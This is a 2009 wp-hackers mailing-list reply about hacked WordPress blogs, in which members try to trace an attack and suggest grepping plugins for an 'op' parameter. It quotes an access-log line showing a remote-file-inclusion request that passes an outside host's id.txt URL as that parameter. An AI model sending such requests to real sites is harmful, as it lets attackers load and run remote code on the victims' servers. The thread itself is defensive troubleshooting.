[wp-hackers] Hacked blogs

Peter van der Does peter at avirtualhome.com
Thu Mar 26 13:24:28 GMT 2009

On Thu, 26 Mar 2009 14:06:18 +0100
Joost de Valk <joost at yoast.com> wrote:

> Files like this:
> http://oursoultvxq.com/bbs/data/vip/id.txt
> Show up in the access logs in some cases though:
> - - [22/Mar/2009:18:04:33 +0100]
> "GET /boek/?op=http://oursoultvxq.com/bbs/data/vip/id.txt????
> HTTP/1.1" 200 23128 "-" "libwww-perl/5.79"
> Best,
> Joost

I wish I could help out in finding the problem but I have the user
agent libwww-perl blocked, so these request won't show up in my Apache

But the action op is not an action that's used a lot, so grepping for op
in your wp-content should give you a clue which plugin it the culprit. I
don't think it's WordPress itself, these two commands:
grep \'op\' * -r and grep \"op\" * -r
don't give me any results.

I was thinking of finding $_POST['op'] or $_POST["op"] or similar GET,

Good luck and let us know your findings on the above grepping please.

Peter van der Does

GPG key: E77E8E98

WordPress Plugin Developer

GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu

More information about the wp-hackers mailing list